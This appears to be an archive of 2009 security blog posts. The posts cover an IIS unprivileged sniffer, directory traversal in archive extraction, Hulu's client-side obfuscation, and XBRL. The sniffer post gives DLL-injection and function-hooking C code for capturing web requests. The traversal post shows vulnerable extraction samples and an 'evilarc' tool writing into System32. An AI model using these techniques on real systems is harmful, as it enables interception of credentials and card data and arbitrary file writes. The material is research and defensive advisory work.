Unprivileged Sniffing

May 18, 2009

The standard attack path against a hardened system almost invariably involves escalating privileges locally. Privileged access allows the attacker to do things like access all data on the server, sniff network traffic, and install rootkits or other privileged malware. Typically, one of the goals of host hardening is to limit the damage that an attacker who has gained access to an unprivileged account can do. “Successfully” hardening a web server, for example, involves preventing the account used by the httpd service/server from modifying the source code of the application it hosts.

Imagine a web server that handles sensitive information, let’s say credit card numbers. This application runs through an interpreter invoked by a web server running as an unprivileged user. No matter how this data is encrypted when at rest, if it can be decrypted by the application, an attacker with the ability to invoke an arbitrary process at the same privilege level as this application will be able to recover the data. This is not true, however, of data which is stored as a hash or encrypted using an asymmetric public key where the private key is not present. In these cases an attacker is often forced to escalate local privileges to sniff data in transit, either by network sniffing or by modifying encryption libraries. Even when data is stored in a retrievable format, especially on hardened systems, recovering this ultimately obfuscated data can be a daunting task for an attacker. Many applications now employ a multi-tiered approach which requires a significant amount of time and effort to attack and gain access to the critical keys or algorithms.

Given the architecture of Windows servers however, it is possible, via access to an unprivileged account such as Local Server, to implement a form of unprivileged sniffer which will monitor sensitive information as it is passed through the target application. This can be implemented in a way which would allow an attacker to trivially monitor all data in motion through the application. In the case of a web application this would include any parameters within a request, data returned by the server, or even headers like those used for basic authentication. This method is generic across applications and can be used to sniff encrypted connections.

The unprivileged sniffer doesn’t employ any tactics that are strictly new and although we haven’t seen this implemented in malware to date it wouldn’t be surprising if something similar has been done. The implementation I will describe is effective against IIS 6 but similar things could be implemented for other applications (SQL Server and Apache come to mind).

The first challenge in hooking into an IIS worker process or Application Pool (w3wp.exe) is knowing when it will start. A request coming into IIS is handled by the W3SVC service and passed off to an Application Pool via a named pipe. The service will either instantiate a new worker process, passing the pipe name as an argument, or assign the connection to an existing worker. The difficulty is that as the “Local Server” user we cannot hook into W3SVC itself, so we must either constantly watch for new instantiations of ‘w3wp.exe’ or have some way of knowing when they start. By monitoring named pipes using the undocumented API ‘NtQueryDirectoryFile’ we can watch for the creation of pipes that start with ‘iisipm’. A pipe will be created each time a new worker is initialized, giving us a head start on hooking the new process.

Now that we know a process will be created we can do a standard library injection using code similar to the following to identify it and inject our sniffer. In this code LIBNAME represents the name of the DLL to inject.

PROCESSENTRY32 entry;
HANDLE snapshot;
BOOL r = FALSE;
DWORD TargetPID = 0;
HANDLE Proc;
LPVOID LoadLibAddr, RemoteName;

/* Find the PID of the "w3wp.exe" process. */
entry.dwSize = sizeof(PROCESSENTRY32);
if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) != INVALID_HANDLE_VALUE) {
  for (r = Process32First(snapshot, &entry); r; r = Process32Next(snapshot, &entry)) {
    if (strstr(entry.szExeFile, "w3wp.exe")) {
      TargetPID = entry.th32ProcessID;
    }
  }
  CloseHandle(snapshot);
}
if (!TargetPID) return;

/* Open the process */
if ((Proc = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, FALSE, TargetPID)) == NULL) return;

/* Get the address of "LoadLibraryA" to use as our remote thread procedure */
if ((LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA")) == NULL) goto out;

/* Allocate a block of memory within "w3wp.exe" to hold the name of the DLL we are injecting and copy it in */
if ((RemoteName = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(LIBNAME) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE)) == NULL) goto out;
if (!WriteProcessMemory(Proc, (void *)RemoteName, LIBNAME, strlen(LIBNAME) + 1, NULL)) goto out;

/* Create a thread within "w3wp.exe" which will load our DLL into memory */
CreateRemoteThread(Proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibAddr, (void *)RemoteName, 0, NULL);

out:
CloseHandle(Proc);

We now have our library loaded into the address space of the worker process. When this occurs the entry point of our library will be called. We will use the concept of a trampoline to hook certain calls within the w3wp process. Specifically IIS uses a library called HTTPAPI for passing around HTTP requests and responses. By hooking into the following calls we can examine requests and responses passed through this worker.

  • HttpReceiveHttpRequest
  • HttpReceiveRequestEntityBody
  • HttpSendHttpResponse
  • HttpSendResponseEntityBody

As an example the following stub shows one way of hooking ‘HttpReceiveHttpRequest’.

/* This will store the address of the HttpReceiveHttpRequest function */
typedef ULONG (WINAPI *HttpReceiveHttpRequestType)(HANDLE, ULONGLONG, ULONG, PHTTP_REQUEST, ULONG, PULONG, LPOVERLAPPED);
HttpReceiveHttpRequestType HttpReceiveHttpRequestSaved;

/* The trampoline structure is used to save both the original 6 bytes of the function we are hooking and the new instructions we replace them with. It is byte-packed so that it is exactly 6 bytes long on 32-bit x86 */
#pragma pack(push, 1)
typedef struct _trampoline {
  unsigned char push;
  void *func;
  unsigned char ret;
} Tramp, *PTramp;
#pragma pack(pop)

Tramp HRHR, oldHRHR;
HMODULE lib;
SIZE_T i;

/* Ensure that HTTPAPI.dll has been loaded */
lib = LoadLibraryA("HTTPAPI.dll");

/* Save the address of "HttpReceiveHttpRequest" */
HttpReceiveHttpRequestSaved = (HttpReceiveHttpRequestType)GetProcAddress(lib, "HttpReceiveHttpRequest");

/* 0x68 is the x86 PUSH instruction */
HRHR.push = 0x68;

/* We are pushing the address of our hook */
HRHR.func = (void *)&HttpReceiveHttpRequestHook;

/* 0xC3 is the x86 RETN instruction which will pop the value we just pushed and jump to that location. This effectively hijacks the flow of execution */
HRHR.ret = 0xC3;

/* We then read the original 6 bytes of the HttpReceiveHttpRequest function */
ReadProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* And replace it with our trampoline code */
WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

We have now replaced the first six bytes of the ‘HttpReceiveHttpRequest’ function mapped within the ‘w3wp.exe’ process to redirect the flow of execution into our hook procedure. Now by creating a hook we can sniff any data passed through this function by implementing code similar to the following.

ULONG WINAPI HttpReceiveHttpRequestHook(HANDLE ReqQueueHandle, ULONGLONG RequestId, ULONG Flags, PHTTP_REQUEST pRequestBuffer, ULONG RequestBufferLength, PULONG pBytesReceived, LPOVERLAPPED pOverlapped) {
  ULONG ret;
  SIZE_T i;
  HANDLE log;

  /* First we replace the first 6 bytes of the real 'HttpReceiveHttpRequest' function with their original value */
  WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

  /* We then call the real function and save the return value */
  ret = HttpReceiveHttpRequestSaved(ReqQueueHandle, RequestId, Flags, pRequestBuffer, RequestBufferLength, pBytesReceived, pOverlapped);

  /* At this point all data within the HTTP_REQUEST stored at pRequestBuffer is valid and can be saved to a file or sent out over the network. This data includes the request headers and GET parameters passed with the request */

  /* After we have performed our sniffing operations we write our trampoline back into the real function */
  WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

  /* And return the saved return value */
  return ret;
}

If similar hooks were implemented for each of the functions listed above all information in and out of IIS could be sniffed in a way which is generic to the web application being used.

Although this implementation is deliberately incomplete, it demonstrates one use case for an unprivileged sniffer. This type of attack is possible in Windows due to specifics of process creation and how privileges are dropped. It is worth mentioning that a comparable attack is generally not possible against similar Linux services. In Linux the ability to ptrace a process is controlled by the dumpable flag within the mm member of the process’ task_struct. When privileges are dropped the dumpable flag is unset and this is inherited when a fork or execve occurs. This prevents the owning user of the resulting process from modifying the process’ execution. Because lower privilege workers are not newly created processes in Linux but rather inherit their task_struct from the root owned parent, they are not debuggable by the lower privileged worker account.
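The dumpable flag mentioned above is visible from user space through the prctl(2) system call. As a rough sketch only, the following Python snippet reads the flag for the current process via ctypes. The helper name get_dumpable is ours, the constant is taken from <linux/prctl.h>, and the code assumes a Linux host with a standard libc; on any other platform it simply returns None.

```python
import ctypes
import sys

PR_GET_DUMPABLE = 3  # option number from <linux/prctl.h>


def get_dumpable():
    """Return the dumpable flag of the calling process, or None when not on Linux.

    Illustrative helper (not part of any library). A value of 0 means the
    process is not dumpable, which also blocks ptrace attaches by an
    unprivileged process running as the same user.
    """
    if not sys.platform.startswith("linux"):
        return None
    libc = ctypes.CDLL(None, use_errno=True)
    # prctl is variadic; declare the argument types so values are passed as longs.
    libc.prctl.argtypes = [ctypes.c_int] + [ctypes.c_ulong] * 4
    libc.prctl.restype = ctypes.c_int
    value = libc.prctl(PR_GET_DUMPABLE, 0, 0, 0, 0)
    if value < 0:
        raise OSError(ctypes.get_errno(), "prctl(PR_GET_DUMPABLE) failed")
    return value


if __name__ == "__main__":
    print("dumpable flag:", get_dumpable())
```

Running this inside a worker that has dropped privileges from root and comparing it with an ordinary user process is one quick way to observe the difference described above.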

We are not currently aware of a way of preventing this type of attack. The Windows privilege structure, and individual privileges such as SeDebugPrivilege, are not designed to prevent access by the owning user. If a fix is possible it would likely relate to the creation of the worker processes and would require modification of the individual applications. If you have an idea for a fix please let us know.


The case for extending XBRL to encompass a Risk and Control taxonomy

May 1, 2009

Through the SEC’s ‘21st Century Disclosure Initiative’ announced in January 2009, and their demand that Fortune 500 companies start XBRL tagging of financial statements and footnotes this year, it’s clear that greater transparency associated with financial reporting and transactions is seen as one of the steps towards improving the ability of investors and lenders to analyse and compare reports of financial performance and strategic declarations. By adopting such a standard, the SEC is seeking to provide investors and lenders with greater confidence in the results of their analysis because there is a defined taxonomy that ensures they are analysing and comparing apples to apples in all aspects of relevant financial statements.

That’s good, it’s helpful and the derived confidence will be further enhanced through the involvement of an Assurance Working Group (AWG) that is co-operating with the International Audit and Assurance Standards Board (IAASB) to develop standards around how XBRL information can be audited.

Whilst XBRL was initially designed to allow standard tagging of financial reporting, it also can be used for financial statements around transaction information, discrete projects and initiatives, etc. It would seem, therefore, that if XBRL tagging could be extended to encompass risk and control information by introducing an extended taxonomy for that, then, perhaps, a far more meaningful value could be associated with those financial statements, or the validity of them could be better trusted.

When Credit Default Swaps (CDS) were sold on, and on, and on, imagine if along with the financial details of the transaction there was a clear statement about the associated risks, along with details of what mitigation measures were in place and how effective they were likely to be. Surely that would have prevented them from being significantly overvalued, or at least allowed recognition that they were being overvalued despite their associated risks.

Ultimately the whole issue of trust is at the hub of the financial crisis we find ourselves in and, interestingly, it parallels an observation that the American economist John Kenneth Galbraith made in 1954. He observed that undiscovered fraud, which he called the ‘bezzle’, is easily hidden in the good times and gets revealed in the bad times. With reference to the great crash of 1929 he wrote, “In good times people are relaxed, trusting, and money is plentiful. But even though money is plentiful, there are always many people who need more. Under these circumstances the rate of embezzlement grows, the rate of discovery falls off, and the bezzle increases rapidly. In depression all this is reversed. Money is watched with a narrow, suspicious eye. The man who handles it is assumed to be dishonest until he proves himself otherwise. Audits are penetrating and meticulous. Commercial morality is enormously improved. The bezzle shrinks.” He also observed that “the bezzle is harder to hide during a tougher economic climate” because of the demand for increased scrutiny.

Applying a similar theory to our CDS example, in the good times the bezzle was large, and there were high levels of trust between the banks and asset management companies, thus, nobody really worried about the increasing risks. But now the bezzle has been revealed, trust has all but disappeared and the market has stagnated.

Hence, it is my belief that additional assurance will be required around financial reporting, particularly with specific transactions, such that a high level of trust can be regained. This will not occur through a high bezzle which exists due to positive market conditions. Rather, it will occur through qualified assurance and tangible evidence of the levels of associated risks and how effectively they are being mitigated. Taking the CDS situation as an example, if the level of associated risk and the efficacy of the control strategy accompanies the transaction the buyer will be better informed and the information will have higher trust.

In my view, therefore, the XBRL taxonomy must extend to include taxonomy around risk and control information.


Directory Traversal in Archives

April 21, 2009

By: Greg Ose and Patrick Toomey

I’m sure on the top of everyone’s list of resolutions from the New Year is the ever forgotten “I will write more secure code” and it seems that each year this task gets harder. With more complex and abstracted frameworks and APIs, the ways security-related bugs are introduced into a code base have become equally complex and abstracted. Being a few months into 2009, hopefully we can help you catch up on your resolutions by presenting something else to look for when reviewing or writing secure code.

In recent engagements, we have run into a slew of issues focusing around the well-known vulnerability of directory path traversal. As a refresher, this typically involves injecting file path meta-characters into a filename string to reference arbitrary files and usually results in the modification or disclosure of files on the system. For example, a user supplies the filename /../../etc/passwd which is appended to the path /tmp/uploaded_pictures and ends up referencing the password file instead of a file under the intended directory.
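As a quick illustration of the refresher above, here is a small Python sketch that appends a user-supplied name to the upload directory and normalizes the result. The function name resolve_naive is ours and stands in for whatever vulnerable code performs the concatenation; posixpath is used so the behaviour is the same regardless of the platform running the snippet.

```python
import posixpath

UPLOAD_DIR = "/tmp/uploaded_pictures"


def resolve_naive(user_filename):
    """Append the user-supplied name to the upload directory with no validation."""
    return posixpath.normpath(UPLOAD_DIR + user_filename)


if __name__ == "__main__":
    print(resolve_naive("/cat.jpg"))           # /tmp/uploaded_pictures/cat.jpg
    print(resolve_naive("/../../etc/passwd"))  # /etc/passwd
```

The second call walks up two directories and lands on the password file, exactly as in the example above.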

We all know, or at least should know, what a typical directory traversal vulnerability and exploit looks like; however, we have recently seen these issues manifest themselves in the handling of user-provided archive files instead of file path strings. Typically, these user-provided files are sent via HTTP uploads. Almost all of the common high-level application APIs provide a means, or a third-party library, to handle archive files. Additionally, almost none of these libraries check for potential directory path traversal when they perform the extraction of these files. This puts the liability on the developer to check for malicious archives. While file operation calls with a user-controlled variable may be obvious, filenames within user-controlled archives may be the vulnerability that slips by. Developers should not only validate user-supplied file paths for directory traversal, but also check file paths included in archive files. As a note, this type of vulnerability has been mentioned before and is not groundbreaking by any means, but we want to take a detailed look into what to be aware of as a developer and how to test for this during vulnerability assessments.

To get started, let’s take a look at an example provided by Sun themselves (!!!) in a technical article for the java.util.zip package. Code Sample 1 from the article provides their base example for extracting an archive and is shown below.

import java.io.*;
import java.util.zip.*;

public class UnZip {
  final int BUFFER = 2048;
  public static void main (String argv[]) {
    try {
      BufferedOutputStream dest = null;
      FileInputStream fis = new FileInputStream(argv[0]);
      ZipInputStream zis = new ZipInputStream(
                               new BufferedInputStream(fis));
      ZipEntry entry;
      while((entry = zis.getNextEntry()) != null) {
        System.out.println("Extracting: " +entry);
        int count;
        byte data[] = new byte[BUFFER];
        // write the files to the disk
        FileOutputStream fos = new FileOutputStream(
                                   entry.getName());
        dest = new BufferedOutputStream(fos, BUFFER);
        while ((count = zis.read(data, 0, BUFFER)) != -1) {
          dest.write(data, 0, count);
        }
        dest.flush();
        dest.close();
      }
      zis.close();
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

We can see where the vulnerability manifests itself in processing each entry of the provided ZIP file:

FileOutputStream fos = new FileOutputStream(entry.getName());

entry is the current ZIP entry being processed and getName() returns the filename stored in that entry. After retrieving this filename, the uncompressed data is written to its value. We can see that by using directory traversal in the filename a malicious user may be able to make arbitrary writes anywhere on the filesystem. Unfortunately, on most platforms, if an attacker can arbitrarily write files they can most likely also get arbitrary code executed on the affected server.
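To make the point that the entry name is entirely attacker-controlled, here is a minimal Python sketch that builds a ZIP archive in memory and reads the stored name back. Nothing is written to disk. The helper names build_archive and list_entry_names are ours, introduced only for illustration.

```python
import io
import zipfile


def build_archive(entry_name, payload=b"demo"):
    """Return the bytes of a ZIP archive holding one entry with the given name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(entry_name, payload)
    return buf.getvalue()


def list_entry_names(archive_bytes):
    """Return the entry names exactly as they are stored in the archive."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    print(list_entry_names(build_archive("../../tmp/evil.txt")))
```

The archive format happily stores the traversal sequence, so any code that passes the returned name straight to a file-open call inherits the problem.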

Similar issues exist with a number of ZIP library implementations across various languages. As one might expect, the equivalent Python code is far less verbose. While Python doesn’t provide any sample code, a simple, and vulnerable, ZIP extraction would look as follows:

from zipfile import ZipFile
import sys
zf = ZipFile(sys.argv[1])
zf.extractall()

The extractall method does what one would expect it to do, except that it does not check for directory traversal in the ZIP entries’ file paths. Python also provides equivalent objects for handling tar archives. Interestingly, the tar archive library documentation does make mention of the risk associated with path traversal within archive files. The documentation for the extractall method states:

Warning: Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with “/” or filenames with two dots “..”.

How about PHP? Surely they provide a function to work with ZIP files (what don’t they have a function for?). The PHP manual provides the following example code for extracting ZIP files.

<?php
$zip = new ZipArchive;
$res = $zip->open('test.zip');
if ($res === TRUE) {
  echo 'ok';
  $zip->extractTo('test');
  $zip->close();
} else {
  echo 'failed, code:' . $res;
}
?>

Sure enough, this code is also vulnerable to file path manipulation within the archive.

What about everyone’s favorite language du jour, Ruby? Ruby itself does not have ZIP file extraction built in to the language’s core library. However, rubyzip is a popular third-party library and like the prior libraries, is also vulnerable to directory traversal. The example below was stated in a post by the library’s author as how to extract a ZIP file and all of its directories:

require 'rubygems'
require 'zip/zipfilesystem'
require 'fileutils'

OUTDIR="out"

Zip::ZipFile::open("all.zip") {
  |zf|

  zf.each { |e|
    fpath = File.join(OUTDIR, e.name)
    FileUtils.mkdir_p(File.dirname(fpath))
    zf.extract(e, fpath)
  }
}

Finally, similar to Ruby, the .Net environment does not have ZIP archive handling built in to the core library. A quick googling for “.Net zip files” leads to an article on MSDN. In this article, the authors detail this gap in the .Net library and then go on to present a solution. The tools released include a signed DLL for use during development and a set of command-line utility programs that utilize the library. One of these command-line utilities is Unzip.exe. Sure enough, Unzip.exe is vulnerable to path traversal within an archive. No warning is presented and the archive is extracted without concern to the fully resolved path of the files within the archive.

How do mainstream, standalone compression utilities handle this vulnerability? We tested a large number of archive extraction programs (WinZip, WinRAR, command-line Info-ZIP, unzip on Unix, etc.) and noted that all of them either provide a warning when a ZIP file entry contains directory traversal, escape the meta-characters, or just ignore the traversed directory path altogether.

When writing code that interacts with archives, the developer must take the same precautions as mainstream extraction utilities. As with any user-controlled input, the file and directory names inside an archive should be validated before being passed to any file operation. The developer should verify that path traversal characters do not occur in any entries within the archive. Similarly, the developer may leverage utility functions within their language to first determine the fully resolved path before extracting an entry (e.g. os.path.normpath(path) in Python) and confirm that it still falls under the intended extraction directory.
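One way to apply the "resolve first, then check" advice is sketched below in Python. The function name is_safe_entry is ours. It resolves the destination an entry would be written to and accepts it only if that destination stays under the extraction directory. Treat it as a starting point under those assumptions rather than a complete defence (it does not, for example, look at symlink entries inside tar files).

```python
import os


def is_safe_entry(dest_dir, entry_name):
    """Return True if entry_name, extracted under dest_dir, stays inside dest_dir."""
    base = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(base, entry_name))
    try:
        return os.path.commonpath([base, target]) == base
    except ValueError:
        # Raised on Windows when the two paths are on different drives.
        return False


if __name__ == "__main__":
    for name in ["pics/cat.jpg", "../evil.txt", "/etc/passwd"]:
        print(name, is_safe_entry("out", name))
```

An extraction loop would call this for every entry and refuse, or at least skip, anything that returns False.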

A more drastic mitigation, though perhaps the better long-term solution, would involve modifying these default libraries to work similarly to their standalone application counterparts by default. It is extremely rare to require path traversal characters in a legitimate archive. Perhaps, the libraries should be modified to secure the common case, requiring a developer to explicitly request the atypical case. For example, what if the Python ZipFile object changed its default behavior to throw an exception in the presence of file traversal characters? The extractall method signature could be modified as follows:

ZipFile.extractall([path[,members[,pwd[,allow_traverse]]]])

By default, allow_traverse would be set to False, throwing zipfile.BadZipfile if path traversal characters are encountered. This would provide a secure-by-default configuration for the library while still allowing the existing behavior if necessary. It requires the developer to explicitly request support for path traversal, thus mitigating accidental and insecure usage. This is unlikely to impact existing code, as archives with path traversal characters are not easy to create and it is extremely unlikely a legitimate archive would accidentally include such characters.
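Until a library offers something like this, the proposed behaviour can be approximated with a thin wrapper. The sketch below is our own illustration, not part of the zipfile module: the names has_traversal and extractall_checked are hypothetical, and it raises zipfile.BadZipFile, which is the Python 3 spelling of the exception named above.

```python
import zipfile


def has_traversal(name):
    """Return True for absolute names, drive-qualified names, or names with a '..' component."""
    normalized = name.replace("\\", "/")
    if normalized.startswith("/"):
        return True
    if len(normalized) > 1 and normalized[1] == ":":
        return True
    return ".." in normalized.split("/")


def extractall_checked(zf, path=None, members=None, pwd=None, allow_traverse=False):
    """Call zf.extractall(), rejecting the archive first unless allow_traverse is set."""
    if members is not None:
        members = list(members)
    names = members if members is not None else zf.namelist()
    if not allow_traverse:
        for member in names:
            name = member.filename if isinstance(member, zipfile.ZipInfo) else member
            if has_traversal(name):
                raise zipfile.BadZipFile("path traversal in entry: %r" % name)
    zf.extractall(path, members, pwd)
```

Checking every name before extracting anything means a malicious archive is rejected as a whole, rather than being left half-extracted.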

During the course of this write-up we grew tired of hand-editing zip archives in a hex-editor to add directory traversal characters. So, we put together a Python script that can be used to generate ZIP archives with path traversal sequences automatically inserted. It can create directories in both Unix and Windows environments for ZIP files (including jar) and tar files with and without compression (gzip or bzip2). You can specify an arbitrary number of directories to traverse and an additional path to append (think var/www or Windows\System32). The full usage follows:

$ ./evilarc.py --help
Usage: evilarc <input file>

Create archive containing a file with directory traversal

Options:
  --version      show program's version number and exit
  -h, --help     show this help message and exit
  -f OUT, --output-file=OUT
                 File to output archive to.  Archive type is
                 based off of file extension.  Supported
                 extensions are zip, jar, tar, tar.bz2, tar.gz,
                 and tgz.  Defaults to evil.zip.
  -d DEPTH, --depth=DEPTH
                 Number directories to traverse. Defaults to 8.
  -o PLATFORM, --os=PLATFORM
                 OS platform for archive (win|unix). Defaults
                 to win.
  -p PATH, --path=PATH  Path to include in filename after
                 traversal.  Ex:WINDOWS\System32\

The following example shows the file test.txt being added to an archive and extracted to the C:\Windows\System32 directory through the vulnerable Java class we previously discussed:

$ ./evilarc.py test.txt -p Windows\\System32\\
Creating evil.zip containing ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ java javaunzip evil.zip
Extracting: ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ ls -al /cygdrive/c/Windows/System32/test.txt
-rwxr-x---+ 1 gose mkgroup-l-d 21 Feb 24 11:52 /cygdrive/c/Windows/System32/test.txt

We have made the script available for download here:

http://www.neohapsis.com/downloads/evilarc.py


Spring Forward

April 20, 2009

As with many, the economic climate has made it challenging to publish as many interesting and insightful concepts and considerations on our blog and in articles as we’d like.   We’ve been focusing our energy on our services and product development staying steadfast in our commitments to our customers and staff.  It’s Spring though and time again to shake off the cobwebs, put on the rubber boots, and march through the mud and puddles to join the tulips and blog for a renewed beginning.

Our work is about exploring the possibilities as much as it is about identifying vulnerabilities, assessing and managing risks, and strategically advising our customers.  Our history and future, as with much of the industry, is predicated on both dotting the i’s, crossing the t’s and delving deeper into ‘why’s’ and ‘what if’s.’  It’s often about conspiring to understand the likes of:

1) Why a seemingly meaningless design, development or implementation trend may cause meaningful and unexpected repercussions in the future

2)  How best practices can come to terms with a Linux distribution when volumes of modules may be installed and loaded by default

3)  What PCI merchants should do to continually be compliant and mitigate their risks and liability

4)  How global earthquakes in the financial sector and a renewed desire to re-establish integrity and transparency may be represented logically in a series of meta-models, frameworks and content which can be visualized to articulate the complexity of associated risks

While many of our explorations have not been published in past weeks, the discussions have continued.  Along with the day to day and a new website, we’ve been researching and writing and debating and discussing findings, theories and concepts, that enlighten our days with meaning and thoughtfulness.    We have been grappling with an assortment of grandiose ideas and mundane mutterings to develop momentum and content that will provide discussions on a more regular and consistent basis.

Welcome to spring, we look forward to conversing with you and appreciate any feedback and thoughts you have that are relevant to you and your challenges.


Hulu…client-side “encryption”…seriously?

April 14, 2009

By: Patrick Toomey

I remember being pretty excited by the prospect of a service like Hulu.   The idea that major networks were actually coming together to stream mainstream video content was impressive.  It was such a departure from the locked down, share nothing, mentality of old.   I thought to myself, “Wow, does Hollywood finally get it?”. Apparently my optimism was exactly that…optimistic.

Sometime in the last week or so it was reported that Hulu, a video streaming service run by NBC and FOX, started “encrypting” Ajax responses to block unauthorized software clients (Boxee et al.) from sidestepping the hulu.com website to view content.  However, encryption is purposefully in quotes, as what Hulu actually implemented is a client-side obfuscation mechanism.  It is well known that such protection mechanisms are flawed by design and bound to be circumvented quickly.

The protective measure that is implemented rests on the obfuscation of Ajax responses made against hulu.com.  Instead of returning plaintext HTML content, Ajax requests return obfuscated URL encoded strings.  These URL encoded strings are reverted to plaintext on the client-side using JavaScript.  For example, a request to:

http://www.hulu.com/channels/Home-and-Garden?kind=videos&sort=popularity

returns a URL encoded string that begins:

dobfu__%F2%9E%84%88%EE%99%81%9F%BD%89%D0%DC …

The entire string is approximately 141KB long.  Other than the “dobfu__” prefix, the remainder of the string is URL encoded.  This obfuscated string is transformed into plaintext by a JavaScript function called “_dobfu()”.  This function, after a bit of reformatting, is reproduced below:

function _dobfu(text) {
  return text.slice(0,7)!='dobfu__'?text:
    $A(unescape(text.substring(7)).tol()).map(function(i) {
      i=0xfeedface^i;
      return String.fromCharCode(i&0xFF,i>>>8&0xFF,i>>>16&0xFF,i>>>24&0xFF);
    }
  ).join('').replace(/\0+$/,'');
}

All of the above code is pretty easy to follow, save for the references to the $A() and tol() functions.  The $A() function is a Prototype global function that creates a full array object from any other object that can pass for an array (supports indexing, etc).  This is done so that the new object inherits the full functionality of an array (the map method is needed in this case).  The second piece of ambiguous logic, the tol() method, is defined in another JavaScript file and is reproduced below:

String.prototype.tol=function(){
  var s=this;
  return $R(0,Math.ceil(s.length/4)-1).map(
    function(i){
      return s.charCodeAt(i*4)+(s.charCodeAt(i*4+1)<<8)+(s.charCodeAt(i*4+2)<<16)+(s.charCodeAt(i*4+3)<<24);
    }
  );
};

Essentially this method takes a string of bytes and creates an array of 32-bit integers from each 4-byte chunk.  For example, if the string processed in the method was “\x01\x23\x45\x67\x89\xab\xcd\xef” the method would return the array [0x67452301, 0xefcdab89].  The ordering of the individual bytes is a result of the “tol()” method parsing the data as little-endian.
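For readers who prefer to poke at this outside of a browser, the same chunking can be sketched in a few lines of Python. This is our own re-expression of the method, not Hulu’s code, and the zero-padding of a short final chunk is an assumption on our part.

```python
def tol(data):
    """Split a byte string into little-endian 32-bit integers, one per 4-byte chunk."""
    padded = data + b"\x00" * (-len(data) % 4)
    return [int.from_bytes(padded[i:i + 4], "little")
            for i in range(0, len(padded), 4)]


if __name__ == "__main__":
    words = tol(bytes.fromhex("0123456789abcdef"))
    print([hex(w) for w in words])  # ['0x67452301', '0xefcdab89']
```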

So, with those two functions defined we can quickly describe how Hulu de-obfuscates responses.  The obfuscated string is broken up into 4-byte integers.  Since the length of the obfuscated string is always evenly divisible by four we are guaranteed that a string of length x will turn into an array of 4-byte integers of length x/4.  Then, for each 4-byte integer, the value is XORed with the constant “0xfeedface”.  Once XORed, the individual bytes from the integer are split apart and converted back to their equivalent ASCII value.  Finally, all trailing NULL bytes are removed from the de-obfuscated string.
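Putting the steps above together, the whole de-obfuscation fits comfortably in a short Python sketch. This is our own port for illustration. It assumes the response only uses %XX escapes (JavaScript’s unescape() also understands %uXXXX, which is ignored here), and the obfu() helper is a hypothetical inverse that exists only to show the round trip.

```python
from urllib.parse import quote_from_bytes, unquote_to_bytes

PREFIX = "dobfu__"
KEY = 0xFEEDFACE


def _xor_words(data):
    """XOR each little-endian 32-bit word of data with KEY, zero-padding the tail."""
    padded = data + b"\x00" * (-len(data) % 4)
    out = bytearray()
    for i in range(0, len(padded), 4):
        word = int.from_bytes(padded[i:i + 4], "little") ^ KEY
        out += word.to_bytes(4, "little")
    return bytes(out)


def dobfu(text):
    """Return the plaintext for a 'dobfu__' response; pass anything else through."""
    if not text.startswith(PREFIX):
        return text
    raw = unquote_to_bytes(text[len(PREFIX):])
    return _xor_words(raw).rstrip(b"\x00").decode("latin-1")


def obfu(plain):
    """Hypothetical inverse of dobfu(), used only to demonstrate the round trip."""
    return PREFIX + quote_from_bytes(_xor_words(plain.encode("latin-1")), safe="")


if __name__ == "__main__":
    # First twelve bytes of the sample response shown earlier.
    print(dobfu("dobfu__%F2%9E%84%88%EE%99%81%9F%BD%89%D0%DC"))  # <div class="
```

Feeding it the opening bytes of the sample response shown earlier yields the start of an ordinary HTML fragment, which is about as much resistance as the scheme offers.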

It is a bit difficult to imagine what Hulu thought they might accomplish with the above scheme.  It effectively does nothing to prevent third-party tools from performing the same obfuscation/de-obfuscation.  Any scheme that attempts to implement client-side “decryption”, particularly in JavaScript, is bound for failure.  The client possesses the obfuscated message, the key to de-obfuscate the message, and the JavaScript that executes the algorithm.  Using these components, it is a trivial exercise to transform any obfuscated response back into plaintext.  Hulu likely thwarted unauthorized software for the better part of an afternoon and no more.  Client-side security mechanisms simply don’t work.  Even complex systems implemented in native code, such as popular DRM schemes, that may go unbroken for a period of time, will eventually be circumvented.  However, to implement a similar preventative measure in JavaScript lowers the difficulty of circumvention dramatically.

Beyond the technical discussion there is also a broader question to be asked. What was the net gain for Hulu? They failed to accomplish their implicit goal: to block unauthorized software. Hulu simply received another bit of bad press for treating their customers like thieves. Hulu, and other such services, need to realize that the ubiquitous availability of their content will ultimately grow their fan base. There is ever-increasing competition for a viewer’s eyes and ears. Podcasts, YouTube, gaming, etc. are all competing. Third-party products, such as Boxee, only serve to increase the ubiquity of their content, which shouldn’t be viewed as a bad thing. Thwarting their own customers only sours the experience and reinforces the presumption that a good chunk of the entertainment industry just doesn’t get it. Besides being bad security, this latest debacle is just bad business.


About CVE-2009-1151

April 6, 2009

During an evaluation of tools for internal use, we took a look at phpMyAdmin. During the assessment, we identified that the scripts/setup.php script is used to generate a configuration file to config/config.inc.php. Anytime PHP code is being generated, extremely careful filtering must be done to ensure that the intended output cannot be escaped and will not allow the injection of arbitrary code.

